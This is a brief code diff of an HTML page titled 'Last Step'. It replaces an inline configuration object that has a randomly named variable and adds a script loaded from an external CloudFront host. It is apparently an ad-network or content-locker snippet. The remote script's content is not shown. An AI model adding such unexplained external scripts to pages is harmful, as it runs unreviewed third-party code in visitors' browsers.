--- a/ct.html
+++ b/ct.html
@@ -1,9 +1,10 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-    <script type="text/javascript">
-    var sfFZI_dQl_iGzQUc = {"it":4494009,"key":"96cc5"};
-  </script>
+<script type="text/javascript">
+    var tySRO_AWK_ltBuWc={"it":4490203,"key":"b4ea5"};
+</script>
+<script src="https://d2v7l2267atlz5.cloudfront.net/a339715.js"></script>
   <meta charset="UTF-8">
   <title>Last Step</title>
 </head>
